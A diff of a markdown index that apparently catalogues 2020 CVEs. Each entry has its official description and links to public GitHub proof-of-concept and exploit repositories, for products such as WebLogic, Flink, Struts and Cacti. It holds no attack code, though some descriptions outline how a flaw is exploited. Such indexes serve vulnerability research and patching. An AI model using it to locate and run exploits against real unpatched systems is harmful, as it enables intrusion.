- [w4cky/CVE-2020-11794](https://github.com/w4cky/CVE-2020-11794)
+### CVE-2020-11819 (2020-04-16)
+
+In Rukovoditel 2.5.2, an attacker may inject an arbitrary .php file location instead of a language file and thus achieve command execution.
+
+
+- [danyx07/PoC-RCE-Rukovoditel](https://github.com/danyx07/PoC-RCE-Rukovoditel)
+
+### CVE-2020-11851 (2020-11-17)
+
+Arbitrary code execution vulnerability on Micro Focus ArcSight Logger product, affecting all version prior to 7.1.1. The vulnerability could be remotely exploited resulting in the execution of arbitrary code.
+
+
+- [ch1nghz/CVE-2020-11851](https://github.com/ch1nghz/CVE-2020-11851)
+
### CVE-2020-11881 (2020-09-14)
An array index error in MikroTik RouterOS 6.41.3 through 6.46.5, and 7.x through 7.0 Beta5, allows an unauthenticated remote attacker to crash the SMB server via modified setup-request packets, aka SUP-12964.
@@ -7567,6 +25168,13 @@
- [botlabsDev/CVE-2020-11881](https://github.com/botlabsDev/CVE-2020-11881)
+### CVE-2020-11883 (2020-04-17)
+
+In Divante vue-storefront-api through 1.11.1 and storefront-api through 1.0-rc.1, as used in VueStorefront PWA, unexpected HTTP requests lead to an exception that discloses the error stack trace, with absolute file paths and Node.js module names.
+
+
+- [0ndras3k/CVE-2020-11883](https://github.com/0ndras3k/CVE-2020-11883)
+
### CVE-2020-11890 (2020-04-21)
An issue was discovered in Joomla! before 3.9.17. Improper input validations in the usergroup table class could lead to a broken ACL configuration.
@@ -7596,6 +25204,7 @@
- [ProjectorBUg/CVE-2020-11932](https://github.com/ProjectorBUg/CVE-2020-11932)
- [Staubgeborener/CVE-2020-11932](https://github.com/Staubgeborener/CVE-2020-11932)
+- [code-developers/CVE-2020-11932](https://github.com/code-developers/CVE-2020-11932)
### CVE-2020-11975 (2020-06-05)
@@ -7604,6 +25213,13 @@
- [1135/unomi_exploit](https://github.com/1135/unomi_exploit)
+### CVE-2020-11978 (2020-07-16)
+
+An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.
+
+
+- [pberba/CVE-2020-11978](https://github.com/pberba/CVE-2020-11978)
+
### CVE-2020-11989 (2020-06-22)
Apache Shiro before 1.5.3, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.
@@ -7611,6 +25227,13 @@
- [HYWZ36/HYWZ36-CVE-2020-11989-code](https://github.com/HYWZ36/HYWZ36-CVE-2020-11989-code)
+### CVE-2020-11990 (2020-12-01)
+
+We have resolved a security issue in the camera plugin that could have affected certain Cordova (Android) applications. An attacker who could install (or lead the victim to install) a specially crafted (or malicious) Android application would be able to access pictures taken with the app externally.
+
+
+- [forse01/CVE-2020-11990-Cordova](https://github.com/forse01/CVE-2020-11990-Cordova)
+
### CVE-2020-11996 (2020-06-26)
A specially crafted sequence of HTTP/2 requests sent to Apache Tomcat 10.0.0-M1 to 10.0.0-M5, 9.0.0.M1 to 9.0.35 and 8.5.0 to 8.5.55 could trigger high CPU usage for several seconds. If a sufficient number of such requests were made on concurrent HTTP/2 connections, the server could become unresponsive.
@@ -7655,6 +25278,20 @@
- [db44k/CVE-2020-12124](https://github.com/db44k/CVE-2020-12124)
- [Scorpion-Security-Labs/CVE-2020-12124](https://github.com/Scorpion-Security-Labs/CVE-2020-12124)
+### CVE-2020-12255 (2020-05-18)
+
+rConfig 3.9.4 is vulnerable to remote code execution due to improper validation in the file upload functionality. vendor.crud.php accepts a file upload by checking content-type without considering the file extension and header. Thus, an attacker can exploit this by uploading a .php file to vendor.php that contains arbitrary PHP code and changing the content-type to image/gif.
+
+
+- [vishwaraj101/CVE-2020-12255](https://github.com/vishwaraj101/CVE-2020-12255)
+
+### CVE-2020-12351 (2020-11-23)
+
+Improper input validation in BlueZ may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.
+
+
+- [naren-jayram/Linux-Heap-Based-Type-Confusion-in-L2CAP](https://github.com/naren-jayram/Linux-Heap-Based-Type-Confusion-in-L2CAP)
+
### CVE-2020-12432 (2020-07-21)
The WOPI API integration for Vereign Collabora CODE through 4.2.2 does not properly restrict delivery of JavaScript to a victim's browser, and lacks proper MIME type access control, which could lead to XSS that steals account credentials via cookies or local storage. The attacker must first obtain an API access token, which can be accomplished if the attacker is able to upload a .docx or .odt file. The associated API endpoints for exploitation are /wopi/files and /wopi/getAccessToken.
@@ -7662,6 +25299,13 @@
- [d7x/CVE-2020-12432](https://github.com/d7x/CVE-2020-12432)
+### CVE-2020-12593 (2020-11-18)
+
+Symantec Endpoint Detection & Response, prior to 4.5, may be susceptible to an information disclosure issue, which is a type of vulnerability that could potentially allow unauthorized access to data.
+
+
+- [nasbench/CVE-2020-12593](https://github.com/nasbench/CVE-2020-12593)
+
### CVE-2020-12625 (2020-05-04)
An issue was discovered in Roundcube Webmail before 1.4.4. There is a cross-site scripting (XSS) vulnerability in rcube_washtml.php because JavaScript code can occur in the CDATA of an HTML message.
@@ -7715,6 +25359,7 @@
- [salgio/ESPTouchCatcher](https://github.com/salgio/ESPTouchCatcher)
+- [salgio/eWeLink-QR-Code](https://github.com/salgio/eWeLink-QR-Code)
### CVE-2020-12712 (2020-06-11)
@@ -7821,6 +25466,13 @@
- [EXP-Docs/CVE-2020-13277](https://github.com/EXP-Docs/CVE-2020-13277)
+### CVE-2020-13401 (2020-06-02)
+
+An issue was discovered in Docker Engine before 19.03.11. An attacker in a container, with the CAP_NET_RAW capability, can craft IPv6 router advertisements, and consequently spoof external IPv6 hosts, obtain sensitive information, or cause a denial of service.
+
+
+- [arax-zaeimi/Docker-Container-CVE-2020-13401](https://github.com/arax-zaeimi/Docker-Container-CVE-2020-13401)
+
### CVE-2020-13405 (2020-07-16)
userfiles/modules/users/controller/controller.php in Microweber before 1.1.20 allows an unauthenticated user to disclose the users database via a /modules/ POST request.
@@ -7845,6 +25497,13 @@
- [asterite3/CVE-2020-13640](https://github.com/asterite3/CVE-2020-13640)
+### CVE-2020-13699 (2020-07-29)
+
+TeamViewer Desktop for Windows before 15.8.3 does not properly quote its custom URI handlers. A malicious website could launch TeamViewer with arbitrary parameters, as demonstrated by a teamviewer10: --play URL. An attacker could force a victim to send an NTLM authentication request and either relay the request or capture the hash for offline password cracking. This affects teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1. The issue is fixed in 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3.
+
+
+- [Dilshan-Eranda/CVE-2020-13699](https://github.com/Dilshan-Eranda/CVE-2020-13699)
+
### CVE-2020-13777 (2020-06-04)
GnuTLS 3.6.x before 3.6.14 uses incorrect cryptography for encrypting a session ticket (a loss of confidentiality in TLS 1.2, and an authentication bypass in TLS 1.3). The earliest affected version is 3.6.4 (2018-09-24) because of an error in a 2018-09-18 commit. Until the first key rotation, the TLS server always uses wrong data in place of an encryption key derived from an application.
@@ -7903,6 +25562,7 @@
- [EXP-Docs/CVE-2020-13933](https://github.com/EXP-Docs/CVE-2020-13933)
- [0xkami/cve-2020-13933](https://github.com/0xkami/cve-2020-13933)
+- [KingBangQ/CVE-2020-13933Project](https://github.com/KingBangQ/CVE-2020-13933Project)
### CVE-2020-13935 (2020-07-14)
@@ -7910,12 +25570,15 @@
- [RedTeamPentesting/CVE-2020-13935](https://github.com/RedTeamPentesting/CVE-2020-13935)
+- [aabbcc19191/CVE-2020-13935](https://github.com/aabbcc19191/CVE-2020-13935)
### CVE-2020-13937 (2020-10-19)
Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed Kylin's configuration information without any authentication, so it is dangerous because some confidential information entries will be disclosed to everyone.
+- [yaunsky/CVE-2020-13937](https://github.com/yaunsky/CVE-2020-13937)
+- [Al1ex/CVE-2020-13937](https://github.com/Al1ex/CVE-2020-13937)
- [kailing0220/CVE-2020-13937](https://github.com/kailing0220/CVE-2020-13937)
### CVE-2020-13942 (2020-11-24)
@@ -7928,6 +25591,22 @@
- [shifa123/CVE-2020-13942-POC-](https://github.com/shifa123/CVE-2020-13942-POC-)
- [blackmarketer/CVE-2020-13942](https://github.com/blackmarketer/CVE-2020-13942)
- [yaunsky/Unomi-CVE-2020-13942](https://github.com/yaunsky/Unomi-CVE-2020-13942)
+- [hoanx4/apche_unomi_rce](https://github.com/hoanx4/apche_unomi_rce)
+- [Prodrious/CVE-2020-13942](https://github.com/Prodrious/CVE-2020-13942)
+
+### CVE-2020-13945 (2020-12-07)
+
+In Apache APISIX, the user enabled the Admin API and deleted the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. This affects versions 1.2, 1.3, 1.4, 1.5.
+
+
+- [YutuSec/Apisix_Crack](https://github.com/YutuSec/Apisix_Crack)
+
+### CVE-2020-13957 (2020-10-13)
+
+Apache Solr versions 6.6.0 to 6.6.6, 7.0.0 to 7.7.3 and 8.0.0 to 8.6.2 prevents some features considered dangerous (which could be used for remote code execution) to be configured in a ConfigSet that's uploaded via API without authentication/authorization. The checks in place to prevent such features can be circumvented by using a combination of UPLOAD/CREATE actions.
+
+
+- [s-index/CVE-2020-13957](https://github.com/s-index/CVE-2020-13957)
### CVE-2020-13958 (2020-11-17)
@@ -7988,11 +25667,19 @@
- [networksecure/CVE-2020-14066](https://github.com/networksecure/CVE-2020-14066)
- [pinpinsec/Icewarp-Email-Server-12.3.0.1-insecure_permissions](https://github.com/pinpinsec/Icewarp-Email-Server-12.3.0.1-insecure_permissions)
+### CVE-2020-14144 (2020-10-16)
+
+The git hook feature in Gitea 1.1.0 through 1.12.5 might allow for authenticated remote code execution in customer environments where the documentation was not understood (e.g., one viewpoint is that the dangerousness of this feature should be documented immediately above the ENABLE_GIT_HOOKS line in the config file). NOTE: The vendor has indicated this is not a vulnerability and states "This is a functionality of the software that is limited to a very limited subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. We provide very clear warnings to users around this functionality and what it provides.
+
+
+- [p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce](https://github.com/p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce)
+
### CVE-2020-14179 (2020-09-11)
Affected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint. The affected versions are before version 8.5.8, and from version 8.6.0 before 8.11.1.
+- [c0brabaghdad1/CVE-2020-14179](https://github.com/c0brabaghdad1/CVE-2020-14179)
- [mrnazu/CVE-2020-14179](https://github.com/mrnazu/CVE-2020-14179)
- [0romos/CVE-2020-14179](https://github.com/0romos/CVE-2020-14179)
@@ -8003,6 +25690,7 @@
- [und3sc0n0c1d0/UserEnumJira](https://github.com/und3sc0n0c1d0/UserEnumJira)
- [Rival420/CVE-2020-14181](https://github.com/Rival420/CVE-2020-14181)
+- [bk-rao/CVE-2020-14181](https://github.com/bk-rao/CVE-2020-14181)
### CVE-2020-14195 (2020-06-16)
@@ -8011,6 +25699,13 @@
- [Al1ex/CVE-2020-14195](https://github.com/Al1ex/CVE-2020-14195)
+### CVE-2020-14210 (2020-06-16)
+
+Reflected Cross-Site Scripting (XSS) vulnerability in MONITORAPP WAF in which script can be executed when responding to Request URL information. It provides a function to response to Request URL information when blocking.
+
+
+- [monitorapp-aicc/report](https://github.com/monitorapp-aicc/report)
+
### CVE-2020-14292 (2020-09-09)
In the COVIDSafe application through 1.0.21 for Android, unsafe use of the Bluetooth transport option in the GATT connection allows attackers to trick the application into establishing a connection over Bluetooth BR/EDR transport, which reveals the public Bluetooth address of the victim's phone without authorisation, bypassing the Bluetooth address randomisation protection in the user's phone.
@@ -8032,12 +25727,44 @@
- [patrickhener/CVE-2020-14294](https://github.com/patrickhener/CVE-2020-14294)
+### CVE-2020-14295 (2020-06-17)
+
+A SQL injection issue in color.php in Cacti 1.2.12 allows an admin to inject SQL via the filter parameter. This can lead to remote command execution because the product accepts stacked queries.
+
+
+- [0z09e/CVE-2020-14295](https://github.com/0z09e/CVE-2020-14295)
+- [mrg3ntl3m4n/CVE-2020-14295](https://github.com/mrg3ntl3m4n/CVE-2020-14295)
+
### CVE-2020-14321 (2022-08-16)
In Moodle before 3.9.1, 3.8.4, 3.7.7 and 3.5.13, teachers of a course were able to assign themselves the manager role within that course.
- [HoangKien1020/CVE-2020-14321](https://github.com/HoangKien1020/CVE-2020-14321)
+- [lanzt/CVE-2020-14321](https://github.com/lanzt/CVE-2020-14321)
+- [f0ns1/CVE-2020-14321-modified-exploit](https://github.com/f0ns1/CVE-2020-14321-modified-exploit)
+
+### CVE-2020-14343 (2021-02-09)
+
+A vulnerability was discovered in the PyYAML library in versions before 5.4, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. This flaw allows an attacker to execute arbitrary code on the system by abusing the python/object/new constructor. This flaw is due to an incomplete fix for CVE-2020-1747.
+
+
+- [j4k0m/loader-CVE-2020-14343](https://github.com/j4k0m/loader-CVE-2020-14343)
+
+### CVE-2020-14356 (2020-08-19)
+
+A flaw null pointer dereference in the Linux kernel cgroupv2 subsystem in versions before 5.7.10 was found in the way when reboot the system. A local user could use this flaw to crash the system or escalate their privileges on the system.
+
+
+- [ShaikUsaf/linux-4.19.72_CVE-2020-14356](https://github.com/ShaikUsaf/linux-4.19.72_CVE-2020-14356)
+
+### CVE-2020-14364 (2020-08-31)
+
+An out-of-bounds read/write access flaw was found in the USB emulator of the QEMU in versions before 5.2.0. This issue occurs while processing USB packets from a guest when USBDevice 'setup_len' exceeds its 'data_buf[4096]' in the do_token_in, do_token_out routines. This flaw allows a guest user to crash the QEMU process, resulting in a denial of service, or the potential execution of arbitrary code with the privileges of the QEMU process on the host.
+
+
+- [gejian-iscas/CVE-2020-14364](https://github.com/gejian-iscas/CVE-2020-14364)
+- [y-f00l/CVE-2020-14364](https://github.com/y-f00l/CVE-2020-14364)
### CVE-2020-14368 (2020-12-14)
@@ -8046,6 +25773,13 @@
- [codingchili/CVE-2020-14368](https://github.com/codingchili/CVE-2020-14368)
+### CVE-2020-14372 (2021-03-03)
+
+A flaw was found in grub2 in versions prior to 2.06, where it incorrectly enables the usage of the ACPI command when Secure Boot is enabled. This flaw allows an attacker with privileged access to craft a Secondary System Description Table (SSDT) containing code to overwrite the Linux kernel lockdown variable content directly into memory. The table is further loaded and executed by the kernel, defeating its Secure Boot lockdown and allowing the attacker to load unsigned code. The highest threat from this vulnerability is to data confidentiality and integrity, as well as system availability.
+
+
+- [kukrimate/CVE-2020-14372](https://github.com/kukrimate/CVE-2020-14372)
+
### CVE-2020-14381 (2020-12-03)
A flaw was found in the Linux kernel’s futex implementation. This flaw allows a local attacker to corrupt system memory or escalate their privileges when creating a futex on a filesystem that is about to be unmounted. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
@@ -8086,6 +25820,21 @@
- [pprietosanchez/CVE-2020-14750](https://github.com/pprietosanchez/CVE-2020-14750)
- [kkhacklabs/CVE-2020-14750](https://github.com/kkhacklabs/CVE-2020-14750)
+### CVE-2020-14756 (2021-01-20)
+
+Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Core Components). Supported versions that are affected are 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle Coherence. Successful attacks of this vulnerability can result in takeover of Oracle Coherence. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
+
+
+- [Y4er/CVE-2020-14756](https://github.com/Y4er/CVE-2020-14756)
+- [somatrasss/weblogic2021](https://github.com/somatrasss/weblogic2021)
+
+### CVE-2020-14871 (2020-10-21)
+
+Vulnerability in the Oracle Solaris product of Oracle Systems (component: Pluggable authentication module). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Solaris. Note: This CVE is not exploitable for Solaris 11.1 and later releases, and ZFSSA 8.7 and later releases, thus the CVSS Base Score is 0.0. CVSS 3.1 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).
+
+
+- [robidev/CVE-2020-14871-Exploit](https://github.com/robidev/CVE-2020-14871-Exploit)
+
### CVE-2020-14882 (2020-10-21)
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
@@ -8111,6 +25860,12 @@
- [xfiftyone/CVE-2020-14882](https://github.com/xfiftyone/CVE-2020-14882)
- [BabyTeam1024/CVE-2020-14882](https://github.com/BabyTeam1024/CVE-2020-14882)
- [adm1in/CodeTest](https://github.com/adm1in/CodeTest)
+- [pwn3z/CVE-2020-14882-WebLogic](https://github.com/pwn3z/CVE-2020-14882-WebLogic)
+- [milo2012/CVE-2020-14882](https://github.com/milo2012/CVE-2020-14882)
+- [kk98kk0/CVE-2020-14882](https://github.com/kk98kk0/CVE-2020-14882)
+- [exploitblizzard/CVE-2020-14882-WebLogic](https://github.com/exploitblizzard/CVE-2020-14882-WebLogic)
+- [qianniaoge/CVE-2020-14882_Exploit_Gui](https://github.com/qianniaoge/CVE-2020-14882_Exploit_Gui)
+- [N0Coriander/CVE-2020-14882-14883](https://github.com/N0Coriander/CVE-2020-14882-14883)
- [Manor99/CVE-2020-14882-](https://github.com/Manor99/CVE-2020-14882-)
- [lolminerxmrig/CVE-2020-14882_ALL](https://github.com/lolminerxmrig/CVE-2020-14882_ALL)
- [nik0nz7/CVE-2020-14882](https://github.com/nik0nz7/CVE-2020-14882)
@@ -8125,6 +25880,8 @@
- [murataydemir/CVE-2020-14883](https://github.com/murataydemir/CVE-2020-14883)
- [B1anda0/CVE-2020-14883](https://github.com/B1anda0/CVE-2020-14883)
+- [fan1029/CVE-2020-14883EXP](https://github.com/fan1029/CVE-2020-14883EXP)
+- [Osyanina/westone-CVE-2020-14883-scanner](https://github.com/Osyanina/westone-CVE-2020-14883-scanner)
- [1n7erface/PocList](https://github.com/1n7erface/PocList)
- [amacloudobia/CVE-2020-14883](https://github.com/amacloudobia/CVE-2020-14883)
@@ -8230,6 +25987,13 @@
- [nccgroup/abstractshimmer](https://github.com/nccgroup/abstractshimmer)
+### CVE-2020-15261 (2020-10-19)
+
+On Windows the Veyon Service before version 4.4.2 contains an unquoted service path vulnerability, allowing locally authenticated users with administrative privileges to run malicious executables with LocalSystem privileges. Since Veyon users (both students and teachers) usually don't have administrative privileges, this vulnerability is only dangerous in anyway unsafe setups. The problem has been fixed in version 4.4.2. As a workaround, the exploitation of the vulnerability can be prevented by revoking administrative privileges from all potentially untrustworthy users.
+
+
+- [yaoyao-cool/CVE-2020-15261](https://github.com/yaoyao-cool/CVE-2020-15261)
+
### CVE-2020-15349 (2020-11-17)
BinaryNights ForkLift 3.x before 3.4 has a local privilege escalation vulnerability because the privileged helper tool implements an XPC interface that allows file operations to any process (copy, move, delete) as root and changing permissions.
@@ -8244,6 +26008,13 @@
- [inflixim4be/CVE-2020-15367](https://github.com/inflixim4be/CVE-2020-15367)
+### CVE-2020-15368 (2020-06-29)
+
+AsrDrv103.sys in the ASRock RGB Driver does not properly restrict access from user space, as demonstrated by triggering a triple fault via a request to zero CR3.
+
+
+- [stong/CVE-2020-15368](https://github.com/stong/CVE-2020-15368)
+
### CVE-2020-15392 (2020-07-07)
A user enumeration vulnerability flaw was found in Venki Supravizio BPM 10.1.2. This issue occurs during password recovery, where a difference in error messages could allow an attacker to determine if a username is valid or not, enabling a brute-force attack with valid usernames.
@@ -8289,6 +26060,7 @@
- [cpandya2909/CVE-2020-15778](https://github.com/cpandya2909/CVE-2020-15778)
+- [Neko-chanQwQ/CVE-2020-15778-Exploit](https://github.com/Neko-chanQwQ/CVE-2020-15778-Exploit)
- [Evan-Zhangyf/CVE-2020-15778](https://github.com/Evan-Zhangyf/CVE-2020-15778)
### CVE-2020-15780 (2020-07-15)
@@ -8305,6 +26077,9 @@
- [francozappa/blur](https://github.com/francozappa/blur)
+### CVE-2020-15808
+- [manucuf/CVE202015808](https://github.com/manucuf/CVE202015808)
+
### CVE-2020-15848
- [faklad/CVE-2020-15848](https://github.com/faklad/CVE-2020-15848)
@@ -8372,6 +26147,7 @@
- [eriknl/CVE-2020-16152](https://github.com/eriknl/CVE-2020-16152)
+- [Nate0634034090/nate158g-m-w-n-l-p-d-a-o-e](https://github.com/Nate0634034090/nate158g-m-w-n-l-p-d-a-o-e)
### CVE-2020-16270 (2020-10-16)
@@ -8385,6 +26161,7 @@
An issue was discovered in SaltStack Salt through 3002. Sending crafted web requests to the Salt API, with the SSH client enabled, can result in shell injection.
+- [zomy22/CVE-2020-16846-Saltstack-Salt-API](https://github.com/zomy22/CVE-2020-16846-Saltstack-Salt-API)
- [hamza-boudouche/projet-secu](https://github.com/hamza-boudouche/projet-secu)
### CVE-2020-16898 (2020-10-16)
@@ -8452,6 +26229,7 @@
- [fengjixuchui/cve-2020-17057](https://github.com/fengjixuchui/cve-2020-17057)
+- [lsw29475/CVE-2020-17057](https://github.com/lsw29475/CVE-2020-17057)
### CVE-2020-17086 (2020-11-11)
@@ -8466,9 +26244,18 @@
- [revengsh/CVE-2020-17087](https://github.com/revengsh/CVE-2020-17087)
+- [ykg88/OHTS_IE6052-CVE-2020-17087](https://github.com/ykg88/OHTS_IE6052-CVE-2020-17087)
- [vp777/Windows-Non-Paged-Pool-Overflow-Exploitation](https://github.com/vp777/Windows-Non-Paged-Pool-Overflow-Exploitation)
- [raiden757/CVE-2020-17087](https://github.com/raiden757/CVE-2020-17087)
+### CVE-2020-17136 (2020-12-09)
+
+Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
+
+
+- [xyddnljydd/CVE-2020-17136](https://github.com/xyddnljydd/CVE-2020-17136)
+- [cssxn/CVE-2020-17136](https://github.com/cssxn/CVE-2020-17136)
+
### CVE-2020-17144 (2020-12-09)
Microsoft Exchange Remote Code Execution Vulnerability
@@ -8490,8 +26277,17 @@
WSO2 Management Console through 5.10 allows XSS via the carbon/admin/login.jsp msgId parameter.
+- [ydycjz6j/CVE-2020-17453-PoC](https://github.com/ydycjz6j/CVE-2020-17453-PoC)
- [karthi-the-hacker/CVE-2020-17453](https://github.com/karthi-the-hacker/CVE-2020-17453)
+### CVE-2020-17456 (2020-08-19)
+
+SEOWON INTECH SLC-130 And SLR-120S devices allow Remote Code Execution via the ipAddr parameter to the system_log.cgi page.
+
+
+- [Al1ex/CVE-2020-17456](https://github.com/Al1ex/CVE-2020-17456)
+- [TAPESH-TEAM/CVE-2020-17456-Seowon-SLR-120S42G-RCE-Exploit-Unauthenticated](https://github.com/TAPESH-TEAM/CVE-2020-17456-Seowon-SLR-120S42G-RCE-Exploit-Unauthenticated)
+
### CVE-2020-17496 (2020-08-12)
vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.
@@ -8500,6 +26296,46 @@
- [ctlyz123/CVE-2020-17496](https://github.com/ctlyz123/CVE-2020-17496)
- [ludy-dev/vBulletin_5.x-tab_panel-RCE](https://github.com/ludy-dev/vBulletin_5.x-tab_panel-RCE)
+### CVE-2020-17518 (2021-01-05)
+
+Apache Flink 1.5.1 introduced a REST handler that allows you to write an uploaded file to an arbitrary location on the local file system, through a maliciously modified HTTP HEADER. The files can be written to any location accessible by Flink 1.5.1. All users should upgrade to Flink 1.11.3 or 1.12.0 if their Flink instance(s) are exposed. The issue was fixed in commit a5264a6f41524afe8ceadf1d8ddc8c80f323ebc4 from apache/flink:master.
+
+
+- [QmF0c3UK/CVE-2020-17518](https://github.com/QmF0c3UK/CVE-2020-17518)
+- [murataydemir/CVE-2020-17518](https://github.com/murataydemir/CVE-2020-17518)
+- [rakjong/Flink-CVE-2020-17518-getshell](https://github.com/rakjong/Flink-CVE-2020-17518-getshell)
+
+### CVE-2020-17519 (2021-01-05)
+
+A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. Access is restricted to files accessible by the JobManager process. All users should upgrade to Flink 1.11.3 or 1.12.0 if their Flink instance(s) are exposed. The issue was fixed in commit b561010b0ee741543c3953306037f00d7a9f0801 from apache/flink:master.
+
+
+- [B1anda0/CVE-2020-17519](https://github.com/B1anda0/CVE-2020-17519)
+- [QmF0c3UK/CVE-2020-17519](https://github.com/QmF0c3UK/CVE-2020-17519)
+- [dolevf/apache-flink-directory-traversal.nse](https://github.com/dolevf/apache-flink-directory-traversal.nse)
+- [hoanx4/CVE-2020-17519](https://github.com/hoanx4/CVE-2020-17519)
+- [murataydemir/CVE-2020-17519](https://github.com/murataydemir/CVE-2020-17519)
+- [radbsie/CVE-2020-17519-Exp](https://github.com/radbsie/CVE-2020-17519-Exp)
+- [yaunsky/CVE-2020-17519-Apache-Flink](https://github.com/yaunsky/CVE-2020-17519-Apache-Flink)
+- [Osyanina/westone-CVE-2020-17519-scanner](https://github.com/Osyanina/westone-CVE-2020-17519-scanner)
+- [givemefivw/CVE-2020-17519](https://github.com/givemefivw/CVE-2020-17519)
+- [MrCl0wnLab/SimplesApachePathTraversal](https://github.com/MrCl0wnLab/SimplesApachePathTraversal)
+- [zhangweijie11/CVE-2020-17519](https://github.com/zhangweijie11/CVE-2020-17519)
+
+### CVE-2020-17523 (2021-02-03)
+
+Apache Shiro before 1.7.1, when using Apache Shiro with Spring, a specially crafted HTTP request may cause an authentication bypass.
+
+
+- [jweny/shiro-cve-2020-17523](https://github.com/jweny/shiro-cve-2020-17523)
+
+### CVE-2020-17527 (2020-12-03)
+
+While investigating bug 64830 it was discovered that Apache Tomcat 10.0.0-M1 to 10.0.0-M9, 9.0.0-M1 to 9.0.39 and 8.5.0 to 8.5.59 could re-use an HTTP request header value from the previous stream received on an HTTP/2 connection for the request associated with the subsequent stream. While this would most likely lead to an error and the closure of the HTTP/2 connection, it is possible that information could leak between requests.
+
+
+- [forse01/CVE-2020-17527-Tomcat](https://github.com/forse01/CVE-2020-17527-Tomcat)
+
### CVE-2020-17530 (2020-12-11)
Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.
@@ -8511,6 +26347,8 @@
- [fengziHK/CVE-2020-17530-strust2-061](https://github.com/fengziHK/CVE-2020-17530-strust2-061)
- [ludy-dev/freemarker_RCE_struts2_s2-061](https://github.com/ludy-dev/freemarker_RCE_struts2_s2-061)
- [CyborgSecurity/CVE-2020-17530](https://github.com/CyborgSecurity/CVE-2020-17530)
+- [uzzzval/CVE-2020-17530](https://github.com/uzzzval/CVE-2020-17530)
+- [killmonday/CVE-2020-17530-s2-061](https://github.com/killmonday/CVE-2020-17530-s2-061)
- [keyuan15/CVE-2020-17530](https://github.com/keyuan15/CVE-2020-17530)
- [nth347/CVE-2020-17530](https://github.com/nth347/CVE-2020-17530)
@@ -8528,6 +26366,27 @@
- [pazeray/CVE-2020-17533](https://github.com/pazeray/CVE-2020-17533)
+### CVE-2020-18324 (2022-03-04)
+
+Cross Site Scripting (XSS) vulnerability exists in Subrion CMS 4.2.1 via the q parameter in the Kickstart template.
+
+
+- [hamm0nz/CVE-2020-18324](https://github.com/hamm0nz/CVE-2020-18324)
+
+### CVE-2020-18325 (2022-03-04)
+
+Multilple Cross Site Scripting (XSS) vulnerability exists in Intelliants Subrion CMS v4.2.1 in the Configuration panel.
+
+
+- [hamm0nz/CVE-2020-18325](https://github.com/hamm0nz/CVE-2020-18325)
+
+### CVE-2020-18326 (2022-03-04)
+
+Cross Site Request Forgery (CSRF) vulnerability exists in Intelliants Subrion CMS v4.2.1 via the Members administrator function, which could let a remote unauthenticated malicious user send an authorised request to victim and successfully create an arbitrary administrator user.
+
+
+- [hamm0nz/CVE-2020-18326](https://github.com/hamm0nz/CVE-2020-18326)
+
### CVE-2020-19360 (2021-01-20)
Local file inclusion in FHEM 6.0 allows in fhem/FileLog_logWrapper file parameter can allow an attacker to include a file, which can lead to sensitive information disclosure.
@@ -8557,6 +26416,34 @@
- [zadewg/RIUS](https://github.com/zadewg/RIUS)
+### CVE-2020-21224 (2021-02-22)
+
